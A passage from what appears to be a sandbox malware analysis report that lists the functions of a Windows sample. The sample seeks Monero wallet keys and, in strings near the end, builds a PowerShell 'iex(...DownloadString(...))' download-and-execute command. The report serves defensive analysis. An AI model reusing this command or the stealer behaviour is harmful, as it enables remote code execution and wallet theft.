                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 004B5041
                              • InternetCloseHandle.WININET(?), ref: 004B50B9
                              • InternetCloseHandle.WININET(?), ref: 004B50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8baeffff36d6504203f4cc7d743ffed7b4a1acb80a9c4dc8fe53e758506d3cac
                              • Instruction ID: 1e2755f4097e79e667a276dbb501a8cb5502d330fc17f60688ca8e20dbf1e4e1
                              • Opcode Fuzzy Hash: 8baeffff36d6504203f4cc7d743ffed7b4a1acb80a9c4dc8fe53e758506d3cac
                              • Instruction Fuzzy Hash: 283108F4A00218ABDB20DF94DC85BDDB7B5EB48704F1081D9E609A7280C7746EC5CFA9
                              Function 004C8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0118DCC8,00000000,?,004D0E2C,00000000,?,00000000), ref: 004C8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004C8158
                              • wsprintfA.USER32 ref: 004C81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: e0ba6ba2a4ae06acc013f76ce5e10a4b8fe0d422ff40177c54fdf02c1bccef3d
                              • Instruction ID: d86047d0cfa4e6d6c255618117c21b58d4c13c2a24202f04092c32a7306f03de
                              • Opcode Fuzzy Hash: e0ba6ba2a4ae06acc013f76ce5e10a4b8fe0d422ff40177c54fdf02c1bccef3d
                              • Instruction Fuzzy Hash: EF213EB1D44208ABDB00DFD5CC49FAEB7B8FB44714F10411EF605BB280D77869018BA9
                              Function 004C83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004C8426
                              • wsprintfA.USER32 ref: 004C8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004C847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C8499
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0118DCE0,00000000,000F003F,?,00000400), ref: 004C84EC
                              • lstrlen.KERNEL32(?), ref: 004C8501
                              • RegQueryValueExA.ADVAPI32(00000000,0118DC68,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,004D0B34), ref: 004C8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 48eb8fe0f8d21568a79cce088e667d46ee250751e1219f1b35fcc4b928185caa
                              • Instruction ID: 7fc2bf8342cb82e8200d09cee93ffa010e33a7472225c20dd3fb864949cddd25
                              • Opcode Fuzzy Hash: 48eb8fe0f8d21568a79cce088e667d46ee250751e1219f1b35fcc4b928185caa
                              • Instruction Fuzzy Hash: B1210AB5A0021C9BDB64DB54DC85FE9B3B9FB48704F00C19DE60996240DF756A85CFE8
                              Function 004C7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0117BA78,00000000,00020119,00000000), ref: 004C76DD
                              • RegQueryValueExA.ADVAPI32(00000000,0118DC80,00000000,00000000,?,000000FF), ref: 004C76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 6353687ce02e70434c10e9e60e10f50cbc86373a18dc076d4a39f85a594e1ee1
                              • Instruction ID: f7662d1d3a19decc6793915511496fb4baee7226d85791fa108faf318cba5dc6
                              • Opcode Fuzzy Hash: 6353687ce02e70434c10e9e60e10f50cbc86373a18dc076d4a39f85a594e1ee1
                              • Instruction Fuzzy Hash: A4014FF9A04208BBD700DBE4DD49F7AB7B9EB48701F105159FA09D7290D6B4A900CF55
                              Function 004C7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0117BA78,00000000,00020119,004C76B9), ref: 004C775B
                              • RegQueryValueExA.ADVAPI32(004C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 004C777A
                              • RegCloseKey.ADVAPI32(004C76B9), ref: 004C7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: ee2704bf1f6d360f24018de7149d365626eb188f01c96ecf225d823806eed2b6
                              • Instruction ID: 42752eafe9f5931db78a48c5341c87dee07039d8b0df40e5c1047d5a429bf17a
                              • Opcode Fuzzy Hash: ee2704bf1f6d360f24018de7149d365626eb188f01c96ecf225d823806eed2b6
                              • Instruction Fuzzy Hash: 3501F4F9A40308BBD700DBE4DC49FBEB7B9EB48705F104559FA19A7285DAB46500CB51
                              Function 004C92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(:L,80000000,00000003,00000000,00000003,00000080,00000000,?,004C3AEE,?), ref: 004C92FC
                              • GetFileSizeEx.KERNEL32(000000FF,:L), ref: 004C9319
                              • CloseHandle.KERNEL32(000000FF), ref: 004C9327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :L$:L
                              • API String ID: 1378416451-1792521768
                              • Opcode ID: 4bcc5cb2b03e73f00449f74d80de2da298cbc07ce617d30c006b7ae088644c97
                              • Instruction ID: 980ba2848ae8993bd416dde3b94a1cc87f38a2a392ac4e9273f3dab60a782b68
                              • Opcode Fuzzy Hash: 4bcc5cb2b03e73f00449f74d80de2da298cbc07ce617d30c006b7ae088644c97
                              • Instruction Fuzzy Hash: F2F03C79E40208BBDB10DFF1DC49FAE77FAAB48710F108658BA55AB2D0D674AA01CF45
                              Function 004C40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 004C40D5
                              • RegOpenKeyExA.ADVAPI32(80000001,0118D140,00000000,00020119,?), ref: 004C40F4
                              • RegQueryValueExA.ADVAPI32(?,0118DEC0,00000000,00000000,00000000,000000FF), ref: 004C4118
                              • RegCloseKey.ADVAPI32(?), ref: 004C4122
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4147
                              • lstrcat.KERNEL32(?,0118DED8), ref: 004C415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 7feed298a7688b936ab5107d4efc7459e67a6d94770637ff68b7e6f071594990
                              • Instruction ID: 3ecaf638fdab6a1ba417ddc6c2471bceac1d40e26a709d56df8cf9cdc64cf053
                              • Opcode Fuzzy Hash: 7feed298a7688b936ab5107d4efc7459e67a6d94770637ff68b7e6f071594990
                              • Instruction Fuzzy Hash: 3C41D8F6D001086BDB24EBE0EC56FFE737DAB88304F40855DB61956181EA755B88CBA2
                              Function 004B99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                              • LocalFree.KERNEL32(004B148F), ref: 004B9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 89eff45a9907334333e59b38f865de3ba8a25e736b3ab61506dbafde422bbf07
                              • Instruction ID: ac6c016cfb54616216b326d344a0f6924d9fe097ebf3829ec6e2b230b43835d1
                              • Opcode Fuzzy Hash: 89eff45a9907334333e59b38f865de3ba8a25e736b3ab61506dbafde422bbf07
                              • Instruction Fuzzy Hash: 6E3123B4A00209EFDB10CFA4C885BEEB7B5BF48340F108159E915A7390C778AE41CFA5
                              Function 004CC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: ccd9ede9687d2ef8633bb49a70adc16a394029b1f8cb1cd9b9d7381e587243b7
                              • Instruction ID: 57c7aa0819a869bb3b7cf9750b07e757c247db47115322f2a81f4bffe816db2d
                              • Opcode Fuzzy Hash: ccd9ede9687d2ef8633bb49a70adc16a394029b1f8cb1cd9b9d7381e587243b7
                              • Instruction Fuzzy Hash: 7D4137B950078C5EDB618B24CCC4FFBBBE89F05708F1444EEE98E86182D2359A45CF68
                              Function 004C4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,0118DF98), ref: 004C47DB
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4801
                              • lstrcat.KERNEL32(?,?), ref: 004C4820
                              • lstrcat.KERNEL32(?,?), ref: 004C4834
                              • lstrcat.KERNEL32(?,0117B210), ref: 004C4847
                              • lstrcat.KERNEL32(?,?), ref: 004C485B
                              • lstrcat.KERNEL32(?,0118D120), ref: 004C486F
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004C8D90: GetFileAttributesA.KERNEL32(00000000,?,004B1B54,?,?,004D564C,?,?,004D0E1F), ref: 004C8D9F
                                • Part of subcall function 004C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004C4580
                                • Part of subcall function 004C4570: RtlAllocateHeap.NTDLL(00000000), ref: 004C4587
                                • Part of subcall function 004C4570: wsprintfA.USER32 ref: 004C45A6
                                • Part of subcall function 004C4570: FindFirstFileA.KERNEL32(?,?), ref: 004C45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: bdf2aec6c53e5f5ea46aa92ad78e41cc954ca31fc2397fd2f5cb0e26f0d33f37
                              • Instruction ID: 5c8026a7351a947653fb78bb12aabb7eb9180555781bbcbbb93b8d3b4584b991
                              • Opcode Fuzzy Hash: bdf2aec6c53e5f5ea46aa92ad78e41cc954ca31fc2397fd2f5cb0e26f0d33f37
                              • Instruction Fuzzy Hash: 413162F690020867CB50FBB0DC85FE9737DAB58704F40458EB31996091EEB99789CBA9
                              Function 004C2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C2D85
                              Strings
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 004C2D04
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 004C2CC4
                              • <, xrefs: 004C2D39
                              • ')", xrefs: 004C2CB3
                              Memory Dump Source
